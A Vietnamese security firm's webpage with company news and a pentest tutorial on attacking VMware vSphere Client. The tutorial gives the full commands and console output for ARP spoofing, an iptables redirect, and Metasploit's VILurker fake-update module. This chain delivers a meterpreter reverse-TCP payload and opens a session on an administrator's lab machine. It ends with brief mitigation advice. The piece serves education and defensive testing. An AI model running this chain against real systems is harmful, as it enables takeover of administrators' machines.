• DNA được Bộ TTTT cấp Giấy Phép Kinh Doanh Dịch Vụ An Toàn Thông Tin

    Cuối tháng 12 vừa qua, DNA chính thức đón nhận Giấy phép kinh doanh dịch vụ An toàn thông tin do Bộ Thông Tin & Truyền Thông cấp, cho phép DNA phát triển và kinh doanh các loại hình dịch vụ an toàn thông tin. Giấy phép số 452/GP-BTTTT chính thức có hiệu lực từ ngày 28/12/2018 và có giá trị trong vòng 10 năm. Trong giai đoạn quyết định lựa chọn lĩnh vực, dịch vụ mà DNA sẽ đăng ký để nhận giấy phép, tập thể Ban lãnh đạo và các cổ đông của DNA đồng thống nhất giữ vững triết lý và tôn chỉ kinh doanh ngay từ những ngày đầu sáng lập: "Không bán giải pháp hay sản phẩm bảo mật, chỉ cung cấp dịch vụ ATTT cao cấp"

  • Dịch vụ Đánh Giá An Toàn Thông Tin: Mô phỏng toàn diện tư duy và hành vi của Hacker

    Dịch vụ Đánh giá An toàn thông tin của DNA nói một cách chính xác là mô phỏng toàn diện tư duy và hành vi như "đối thủ cạnh tranh" của khách hàng, thông qua đó DNA có thể chứng minh được kẻ tấn công bằng cách nào có thể truy cập trái phép đến hạ tầng hệ thống và dữ liệu nhạy cảm, từ đó giúp cho khách hàng biết được chính xác cần phải tập trung đầu tư vào điều gì để bảo vệ tổ chức đối với những cuộc tấn công diễn ra trong thực tế.

  • Đầu tư 2 tỷ đồng để triển khai chiến lược toàn diện đảm bảo ATTT cho tỉnh Tây Ninh

    Thực hiện Quyết định 2521/QĐ-UBND ngày 31/10/2014 của UBND tỉnh Tây Ninh về việc phê duyệt dự án Triển khai chiến lược toàn diện đảm bảo an toàn an ninh thông tin cho Trung tâm tích hợp dữ liệu (TTTHDL) của tỉnh đến năm 2020; Công văn số 970/UBND-VH ngày 14/4/2015 của UBND tỉnh về việc tăng cường bảo đảm ATTT trong cơ quan, tổ chức nhà nước. Vào đầu tháng 5 vừa qua, Công ty cố vấn chiến lược An toàn thông tin DNA và Sở Thông Tin Truyền Thông tỉnh Tây Ninh đã chính thức ký kết hợp đồng thực hiện dự án "Triển khai chiến lược toàn diện đảm bảo an toàn an ninh thông tin cho Trung tâm THDL tỉnh". Tổng mức đầu tư của dự án là gần 2 tỷ đồng.

  • Triển khai dự án đánh giá an toàn thông tin cho TOP 10 công ty gia công phần mềm

    Sau khi khảo sát và tìm hiểu về thị trường đánh giá an toàn thông tin tại Việt Nam, KMS đã quyết định hợp tác với công ty cố vấn chiến lược và đánh giá độc lập an toàn thông tin DNA. Là công ty chuyên cung cấp các dịch vụ đánh giá cao cấp liên quan đến an toàn thông tin, DNA đã đáp ứng được những yêu cầu nghiêm ngặt của KMS, chịu trách nhiệm đánh giá an toàn thông tin định kỳ hàng năm, mỗi năm sẽ thay đổi những loại hình đánh giá khác nhau để kiểm tra toàn diện các mối đe dọa mà KMS có thể đối mặt trong tương lai.

Strategic Consulting

Cố vấn chiến lược

Ngày nay, nhiều tổ chức không ngừng cố gắng xây dựng, phát triển và mong muốn triển khai thành công một chiến lược an toàn thông tin toàn diện, có sự gắn kết chặt chẽ với những mục tiêu bảo mật rõ ràng, các yêu cầu quy định pháp lý và tiêu chuẩn quốc tế.

Nếu chiến lược an toàn thông tin được triển khai đúng cách thì tổ chức không chỉ đạt được những mục tiêu về bảo mật và tuân thủ, mà còn có thể thấu hiểu tường tận bức tranh an toàn thông tin của tổ chức.

Penetration Testing

Đánh giá An Toàn Thông Tin

Dịch vụ Đánh giá An toàn thông tin của DNA nói một cách chính xác là mô phỏng toàn diện tư duy và hành vi của Hacker, thông qua đó DNA có thể chứng minh được kẻ tấn công bằng cách nào có thể truy cập trái phép đến hạ tầng hệ thống và dữ liệu nhạy cảm của khách hàng.

DNA cung cấp một loạt các dịch vụ Đánh giá an toàn thông tin cao cấp, được thiết kế để đáp ứng toàn diện đối với từng nhu cầu cụ thể của khách hàng.

SANS

Huấn luyện đào tạo

Chương trình huấn luyện đào tạo của DNA được thiết kế để kết hợp giữa kiến thức nền tảng và kinh nghiệm thực tế vào bên trong từng giáo trình huấn luyện.

Đối với các chương trình huấn luyện hướng về kỹ năng quản lý, học viên sẽ được trải nghiệm phối hợp triển khai các dự án mà DNA đã và đang thực hiện, nhằm giúp học viên có cái nhìn thực tế đối với lĩnh vực an toàn thông tin.

Một số tổ chức tiêu biểu hàng đầu tại Việt Nam đã tin cậy DNA
DNA Customer

Tấn công môi trường ảo hóa Vmware vSphere

 vSphere Client sẽ hỏi vCenter hoặc Host "Phiên bản mới nhất của vSphere Client là bao nhiêu?" Nếu có một phiên bản mới được cập nhật, Client sẽ được cho biết đường dẫn để tải về và có thể cập nhật ngay lập tức. Sau đây là các địa chỉ IP dành cho đợt tấn công này :

IP của Hacker : 192.168.130.151
IP của nạn nhân: 192.168.130.95
IP của máy chủ ESXi: 192.168.130.13

Bởi vì đây là cuộc tấn công MiTM nên tôi bắt buộc phải can thiệp vào lưu lượng truyền tải giữa nạn nhân và máy chủ ESXi. Tôi sẽ sử dụng arpspoof :

[root@fedora metasploit]# arpspoof -i p4p1 -t 192.168.130.95 192.168.130.13

Tôi cũng sẽ chuyển hướng kết nối mạng cho quá trình tấn công với câu lệnh iptables như sau :

[root@fedora metasploit]# iptables -t nat -A PREROUTING -d 192.168.130.13 -p tcp --dport 443 -j DNAT --to-destination 192.168.130.151:443

Tới thời điểm này tôi đang tiến hành đánh chặn (intercepting) và định tuyến lại lưu lượng truyền tải, tiếp theo là bắt tay vào cho chạy module VIlurker

 

Mô tả :

Module này sẽ thực hiện tấn công đối với môi trường cơ sở hạ tầng ảo hóa hoặc vSphere Client. VI Client sẽ bị đánh lừa để tải về bản cập nhật giả mạo (fake update), thực thi dưới thông tin xác thực của người dùng. Có Metasploit payload ở đây không ? Có, tôi sẽ sử dụng loại Payload phổ biến nhất của Metasploit để chiếm quyền kiểm soát máy chủ Windows, Meterpreter Payload. Có một vài cấu hình tôi cần thiết lập trước khi tiến hành khai thác

Tôi sẽ sử dụng phương thức Reverse TCP thay vì Bind TCP. Với phương thức Reverse TCP, tôi sẽ yêu cầu nạn nhân tự động kết nối đến mình thay vì phải mở Port để tôi kết nối đến máy nạn nhân (Listing 6).

Sau khi tất cả các cấu hình đã được thiết lập, tôi bắt đầu cho tiến hành khai thác, Exploit thôi nào ! Việc tiếp theo là ngồi yên, pha một ly cà phê nóng, ăn miếng bánh ngọt nhâm nhi thưởng thức chờ đợi Administrator kết nối đến !

Listing 6 : Cấu hình VILurker

{jb_bluebox}msf  auxiliary(vmware_vilurker) > set RPORT 6565
RPORT => 6565
msf  auxiliary(vmware_vilurker) > exploit
[*] Auxiliary module execution completed
[*] [2013.04.26-15:49:58] Server started.

msf  auxiliary(vmware_vilurker)

Nhìn vào bảng ghi chú dưới đây bạn sẽ thấy có một kết nối vừa được thiết lập và vSphere Client đang yêu cầu tập tin "Clients.xml". VIlurker sẽ thay mặt cho tôi cung cấp tập tin này :

Listing 7 : VILurker đang tấn công

[*] [2013.04.26-15:50:09] VIlurker - 192.168.130.95 is asking for clients.xml. Triggering VIlurker
[*] [2013.04.26-15:50:09] answering HTTP/1.1 200 Ok
Host: 192.168.130.151
Content-Type: text/xml
Content-Length: 266
Connection: Close
<ConfigRoot>
<clientConnection id="0000">
<authdPort>902</authdPort>
<version>10</version>
<patchVersion>10.0.0</patchVersion>
<apiVersion>10.0.0</apiVersion>
<downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
</clientConnection>
</ConfigRoot>

Tiếp theo, Administrator sẽ bấm nút "Yes" để cập nhật vSphere Client và tôi sẽ "thấy" như sau trên console của mình :

[*] [2013.04.26-15:50:11] VIlurker - Bingo 192.168.130.95 is asking for the update. Creating the exploit
[*] [2013.04.26-15:50:11] VIlurker - Creating payload...
[*] [2013.04.26-15:50:11] Executing /opt/metasploit/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.130.151 LPORT=6567 X > /root/.msf4/modules/auxiliary/vasto/data/lurker.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.130.151", "LPORT"=>"6567"}
[*] [2013.04.26-15:50:19] 192.168.130.95 uploading exploit
[*] [2013.04.26-15:50:19] VIlurker - Saving session information on the DB

Tôi sẽ cấu hình Handler để chấp nhận kết nối đến từ phía Administrator :

msf  auxiliary(vmware_vilurker) > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 6567 
LPORT => 6567
msf  exploit(handler) > set LHOST 192.168.130.151
LHOST => 192.168.130.151
msf  exploit(handler) > exploit

Tuyệt vời, lúc này đây có thể nói tôi đã thiết lập thành công kịch bản tấn công MiTM, đánh lừa vSphere Administrator rằng có một bản cập nhật mới cho vSphere Client.

Sau khi Administrator đồng ý bấm nút "Yes" để cập nhật, gói cập nhật giả mạo sẽ được gửi đến và Administrator phải đồng ý cho cài đặt bản cập nhật, các quản trị viên thường luôn luôn đồng ý vì cập nhật là điều tuyệt vời ! Hình 12 là những gì mà Administrator sẽ nhìn thấy trong giai đoạn này :

Administrator sẽ cài đặt bản cập nhật mà trên thực tế nó chính là Meterpreter payload. Sau khi hoàn tất việc cài đặt, Administrator sẽ tiếp tục công việc của mình, kết nối đến vCenter mà không nhận thấy có bất kỳ điều gì khác thường đã diễn ra. Là một kẻ tấn công, tôi sẽ thấy như sau :

[*] [2013.04.26-15:51:59] Sending stage (752128 bytes) to 192.168.130.95
[*] Meterpreter session 1 opened (192.168.130.151: 6567 -> 192.168.130.95:2980) at 2013-04-26
15:52:01 +0200

Có thể nói giờ đây tôi đã chiếm toàn quyền kiểm soát máy tính của vSphere Administrator. Tất nhiên, đây chỉ là một trong số nhiều kịch bản tấn công, khi chúng tôi tiến hành đánh giá bảo mật môi trường ảo hóa.

Để ngăn chặn loại tấn công này, bạn nên cân nhắc đến cách mà quản trị viên kết nối với cơ sở hạ tầng ảo hóa, nếu bạn không thể đáp ứng việc phân tách mạng lưới riêng biệt, ít nhất bạn phải chú ý đến các bản cập nhật mà bạn đã áp dụng cho vCenter hoặc máy chủ. Bài viết này có thể chỉ cung cấp đủ một chừng mực thông tin nào đó để các bạn có thể tiến hành thử nghiệm tấn công đối với môi trường ảo hóa VMware.

Có rất nhiều kinh nghiệm, kiến thức mà chúng tôi (DNA Media Team) muốn chia sẻ với các bạn. Vì điều đó nên chúng tôi đã quyết định đều đặn hàng tháng sẽ viết 4 bài về an toàn thông tin, tất cả đều được chia sẻ miễn phí và hoàn toàn bằng tiếng việt. Có 2 bài dành cho các bạn đang làm việc với vai trò nghiên cứu kỹ thuật (Chuyên trang Pentest), 2 bài còn lại dành cho các bạn đang điều hành quản lý an toàn thông tin (Chuyên trang CSO).

Rất mong nhận được sự phản hồi đóng góp ý kiến của tất cả các bạn để chúng tôi có thể hoàn thiện, chỉnh chu hơn về nội dung, bố cục, độ dài của bài viết.

Chúng tôi mong muốn có thể đóng góp một phần nhỏ nào đó cho cộng đồng an toàn thông tin của Việt Nam, tất cả là vì tinh thần dân tộc. Thay vì phản đối tiêu cực với tình hình an ninh của đất nước nói chung và an ninh mạng nói riêng qua những hoạt động tấn công chiến tranh mạng, chúng ta hãy cùng nhau chia sẻ kinh nghiệm sẽ hay hơn so với việc mỗi người giữ riêng kiến thức cho bản thân mình.

Vài lời chia sẻ cùng các bạn độc giả.

 DNA Media Team


Liên hệ DNA

 

Mobile  +84 (28) 38 266 877
  +84 (28) 39 401 619

 

Location  DNA Headquarter
  60 Nguyễn Đình Chiểu

  F1 Rosana Tower, Quận 1
         TP.Hồ Chí Minh, Việt Nam